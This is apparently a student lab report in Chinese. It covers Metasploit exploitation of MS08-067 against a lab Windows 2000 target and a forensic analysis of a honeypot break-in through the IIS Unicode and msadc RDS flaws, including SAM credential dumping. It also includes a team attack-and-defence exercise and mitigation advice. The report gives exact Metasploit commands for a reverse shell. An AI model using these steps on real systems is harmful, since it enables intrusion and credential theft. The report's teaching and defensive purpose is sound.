目录
1.动手实践Metasploit windows attacker
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
一.实验介绍
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
二.实验过程
1.动手实践Metasploit windows attacker
在 Kali 攻击机终端使用以下命令进入 Metasploit
msfconsole
使用search ms08_067查看详细信息。
use windows/smb/ms08_067_netapi使用相关攻击脚本
命令:show payloads显示可用的攻击负载,并选取第三个为攻击负载模块。
set payload generic/shell_reverse_tcp选择你要用的攻击负载模块,为刚刚选取的第三个。
set RHOST 192.168.200.124设置靶机为win2k
set LHOST 192.168.200.2设置攻击机为kali
输入exploit开始攻击,会话建立成功。
再使用ipconfig发现,靶机地址。
使用wireshark捕获攻击过程产生的数据包,源端口为:4444,目的端口为1044.可以看到攻击的主机地址。
2.取证分析实践:解码一次成功的NT系统破解攻击
(1)攻击者使用了什么破解工具进行攻击
下载snort-0204@0117.log,使用wireshark捕获数据。
追踪HTTP数据流,可以发现编号为117的数据包发现了异常流量,找到特殊字符%C0%AF,在Unicode编码中对应符号/,因此可以推测存在UNICODE编码漏洞攻击,说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况:
(2)攻击者如何使用这个破解工具进入并控制了系统
第140行:攻击者试图向服务器获取一个msadcs.dll文件:
攻击者利用这个dll存在RDS漏洞,输入了个数据查询语句进行SQL注入攻击。根据“ADM!ROX!YOUR!WORLD”特征字符串,以及查询语句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,通过查询可以知道到它是由rain forest puppy 编写的 msadc
(3)攻击者获得系统访问权限后做了什么
确定是msadc.pl/msadc2.pl渗透脚本工具后,接下来使用 http.request.uri contains "msadc" 进行筛选,可以看到攻击机成功往被攻击设备上传了后门工具
尝试提升本地权限,向yay.txt和yay2.txt的文件内写指令,失败后又尝试查看用户组信息,将IUSR加入本地管理员组
获取SAM备份,在上一步获取权限之后转而去继续获取SAM密码。这次rdisk /s-备份关键系统信息,在%systemroot%\repair中会创建一个sam._的SAM压缩拷贝
开启了一个远程shell,成功的获取到了SAM的值,并写入文件har.txt,将SAM备份文件拷贝到IIS的根目录inetpub,并通过web方式进行了下载
(4)我们如何防止这样的攻击
口令要具有较高的强度,这样可以增大破解口令难度;定期的打补丁,修复漏洞;要定期的扫描自身的主机,查看是否存在漏洞等危险。
限制网络用户访问和调用CMD命令的权限,若没必要使用SCRIPTS和MSADC目录,删除或改名。
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
可知攻击者已经知道这是一台蜜罐主因为他建立了一个文件,并输入了如下内容
C:>echo best honeypot i’ve seen till now > rfp.txt
3.团队对抗实践:windows系统远程渗透攻击和分析
1.攻击实践:
实践环境:
攻击机Kali:192.168.85.223(20223801刘莹)
靶机Win2k:192.168.85.53(20223802黄千里)
按照实验一的办法,选择攻击负载模块,设置攻击机与靶机
进行攻击,建立会话,以及查看ip检查是否攻击成功。在我的kali机中建立一个名为ly的文件。
在靶机的文件夹中发现名为ly的文件夹
在使用wireshark发现跟踪攻击。发现源端口为445,目的端口为36707
2.靶机实践:
实践环境:
攻击机Kali:192.168.85.193(20232802黄千里)
靶机Win2k:192.168.85.62(20223801刘莹)
三.学习中遇到的问题及解决
问题1:win2k换成桥接模式后ip地址没有改变,且无法pingtong
解决办法:将win2k时将IP地址设置从手动配置改为自动获取。
问题2:kali在换为桥接模式后,没有IP地址。
解决办法:重置网络配置。
四.实践总结
在本次实验中,我学会了如何使用Metasploit利用MS08-067漏洞攻击Windows系统,并且成功拿到了shell,可以对靶机进行远程控制。
参考资料
https://blog.csdn.net/weixin_44888994/article/details/130245258?spm=1001.2014.3001.5502